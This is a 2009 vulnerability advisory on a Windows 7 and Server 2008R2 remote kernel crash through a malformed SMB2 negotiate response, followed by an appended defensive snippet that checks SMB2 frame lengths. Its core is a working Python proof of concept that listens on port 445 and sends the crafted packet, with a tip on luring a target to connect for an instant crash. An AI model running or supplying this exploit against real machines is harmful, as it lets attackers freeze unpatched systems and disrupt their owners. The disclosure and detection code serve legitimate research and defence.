win7-crash.txt

Posted on 17 November 2009

=============================================
- Release date: November 11th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium/High
=============================================

I. VULNERABILITY
-------------------------
Windows 7 * , Server 2008R2 Remote Kernel Crash

II. BACKGROUND
-------------------------
#FAIL,#FAIL,#FAIL
SDL FAIL, 'Most Secure Os Ever' --> Remote Kernel in 2 mn.
#FAIL,#FAIL,#FAIL

III. DESCRIPTION
-------------------------
See : http://g-laurent.blogspot.com/ for much more details
#Comment: This bug is specific to Windows 7/2008R2.

IV. PROOF OF CONCEPT
-------------------------
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffié
#
import socketserver

# NetBIOS session-service header followed by a malformed SMB2 NEGOTIATE response
packet = (
    b"\x00\x00\x00\x9a"  # ---> length should be 9e not 9a..
    b"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
    b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
    b"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
    b"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
    b"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
    b"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
    b"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"
)

class SMB2(socketserver.BaseRequestHandler):
    def handle(self):
        print("Who:", self.client_address)
        data = self.request.recv(1024)   # the client's NEGOTIATE request, ignored
        self.request.send(packet)        # answer with the malformed response
        self.request.close()

launch = socketserver.TCPServer(('', 445), SMB2)  # listen all interfaces port 445
launch.serve_forever()
#SDL FAILED

V. BUSINESS IMPACT
-------------------------
An attacker can remotely crash any Windows 7/Server 2008R2.

VI. SYSTEMS AFFECTED
-------------------------
Windows 7, Windows Server 2008R2

VII. SOLUTION
-------------------------
No patch available for the moment, your vendor does not care. Close the SMB feature and ports until a real audit is provided.

VIII. REFERENCES
-------------------------
http://blogs.msdn.com/sdl/
http://g-laurent.blogspot.com/
http://twitter.com/g_laurent

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
-------------------------
November 8th, 2009: MSRC contacted
November 8th, 2009: MSRC acknowledged the vuln
November 11th, 2009: MSRC tried to convince me that a multi-vendor IPv6 bug shouldn't appear on a security bulletin.
November 11th, 2009: Win 7 remote kernel smash released

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

XII. PERSONAL NOTES
-------------------------
More Remote Kernel FD @MS to come.
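Added example, not part of the advisory: the consistency check a client-side SMB2 parser or an IDS should apply before trusting any offset in a received frame, run over the bytes from the proof of concept above. The NetBIOS header declares 0x9a (154) bytes while 158 are actually sent, and the NEGOTIATE response's security buffer (offset 128, length 30) ends past that declared length; field offsets follow the MS-SMB2 NEGOTIATE response layout, and the helper names are this example's own.

```python
import struct

# Bytes taken from the PoC above: NetBIOS session-service header with the
# declared length 0x9a = 154, then the 158-byte SMB2 NEGOTIATE response.
POC_NBSS_HEADER = b"\x00\x00\x00\x9a"
POC_SMB2_BODY = (
    b"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
    b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
    b"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
    b"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
    b"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
    b"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
    b"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"
)

def nbss_frame(body):
    """Wrap an SMB2 message in a NetBIOS session-service header with the correct length."""
    return b"\x00" + len(body).to_bytes(3, "big") + body

def check_smb2_frame(frame):
    """Return the consistency problems found in a NetBIOS+SMB2 frame (empty list = clean)."""
    problems = []
    if len(frame) < 4 + 64:
        return ["frame shorter than NetBIOS header plus SMB2 header"]
    declared = int.from_bytes(frame[1:4], "big")   # 24-bit big-endian length
    actual = len(frame) - 4
    if frame[0] != 0:
        problems.append("NetBIOS message type 0x%02x is not a session message" % frame[0])
    if declared != actual:
        problems.append("NetBIOS length %d does not match %d bytes received" % (declared, actual))
    body = frame[4:]
    if body[:4] != b"\xfeSMB":
        problems.append("SMB2 ProtocolId missing")
    header_size = struct.unpack_from("<H", body, 4)[0]
    command = struct.unpack_from("<H", body, 12)[0]
    if header_size != 64:
        problems.append("SMB2 header StructureSize %d != 64" % header_size)
    # NEGOTIATE (command 0) response: 64-byte fixed part after the header;
    # SecurityBufferOffset/SecurityBufferLength sit at offsets 56 and 58 of it.
    if command == 0 and len(body) >= 64 + 60:
        sec_off, sec_len = struct.unpack_from("<HH", body, 64 + 56)
        if sec_off + sec_len > declared:   # buffer runs past what the header promised
            problems.append("security buffer [%d, %d) exceeds declared length %d"
                            % (sec_off, sec_off + sec_len, declared))
    return problems
```

Rebuilding the same body with nbss_frame() yields a length field of 0x9e and no findings, which is the check the comment "length should be 9e not 9a" in the PoC refers to.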
